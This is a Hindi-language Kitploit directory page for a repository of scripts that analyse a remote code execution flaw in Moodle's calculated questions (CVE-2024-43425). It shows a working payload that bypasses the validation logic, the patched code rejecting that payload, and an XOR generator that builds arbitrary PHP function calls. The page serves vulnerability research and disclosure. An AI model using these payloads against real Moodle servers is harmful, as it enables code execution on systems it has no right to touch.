Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
moodle-rce-calculatedquestions — मूडल कैलकुलेटेड प्रश्नों में RCE के विश्लेषण के लिए स्क्रिप्ट्स (CVE-2024-43425) | Kitploit
उपकरण/GitHubGitHub/redteampentesting/moodle-rce-calculatedquestions
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षा
GitHubredteampentesting/moodle-rce-calculatedquestions

moodle-rce-calculatedquestions

मूडल कैलकुलेटेड प्रश्नों में RCE के विश्लेषण के लिए स्क्रिप्ट्स (CVE-2024-43425)

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1951 साल पहलेअभी तक समीक्षित नहीं

मूडल कैलकुलेटेड प्रश्नों में इनपुट सत्यापन का परीक्षण करने के लिए स्क्रिप्ट्स (CVE-2024-43425)

यह रिपॉजिटरी ब्लॉग पोस्ट वापस स्कूल - मूडल में एक दूरस्थ कोड निष्पादन भेद्यता का शोषण से संबंधित सहायक स्क्रिप्ट्स शामिल करती है, जो मूडल लर्निंग प्लेटफ़ॉर्म में एक दूरस्थ कोड निष्पादन भेद्यता का वर्णन करती है।

सत्यापन लॉजिक का परीक्षण करें

validation निर्देशिका में मौजूद स्क्रिप्ट्स का उपयोग PHP eval() कॉल के दुरुपयोग को रोकने के लिए Moodle द्वारा उपयोग किए जाने वाले सत्यापन लॉजिक के विरुद्ध इनपुट स्ट्रिंग्स का सीधे परीक्षण करने के लिए किया जा सकता है।

सभी कोड स्निपेट्स सीधे Moodle के स्रोत कोड से लिए गए हैं, जिसमें कमजोर संस्करण के लिए 4.4.1 रिलीज़ और सुरक्षित संस्करण के लिए 4.4.2 का उपयोग किया गया है। स्क्रिप्ट्स में question/type/calculated/questiontype.php फ़ाइल के प्रासंगिक भाग शामिल हैं।

validation.php फ़ाइल कमजोर सत्यापन लॉजिक का उपयोग करती है:

root@kitploit:~
$ php validation.php '(1)->{phpinfo()}'
phpinfo()
PHP Version => 8.3.10
[...]

यह रिपॉजिटरी validation-fixed.php में सत्यापन कोड का सुरक्षित संस्करण भी शामिल करती है:

root@kitploit:~
$ php validation-fixed.php '(1)->{phpinfo()}'
error illegalformulasyntax with value: {phpinfo()}
[...]

फ़ंक्शन नाम उत्पन्न करें

xor-generator.py स्क्रिप्ट का उपयोग वेरिएबल फ़ंक्शनों पर आधारित एक्सप्रेशन उत्पन्न करने के लिए किया जा सकता है, जो Moodle के कमजोर संस्करणों में एक एकल संख्यात्मक पैरामीटर के साथ किसी भी PHP फ़ंक्शन को कॉल करने की अनुमति देते हैं:

root@kitploit:~
$ ./xor-generator.py 'PRINTF'
((acos(2) . 0+acos(2)) ^ (2 . 6 . 0 . 0 . 0 . 0) ^ (1 . 0 . 0 . 0 . -8) ^ (0 . -4 . 1 . 8 . 0) ^ (-8 . 3 . 1 . 0 . 0))

$ php -r '((acos(2) . 0+acos(2)) ^ (2 . 6 . 0 . 0 . 0 . 0) ^ (1 . 0 . 0 . 0 . -8) ^ (0 . -4 . 1 . 8 . 0) ^ (-8 . 3 . 1 . 0 . 0))("Test");'
Test
टूल डाउनलोड करें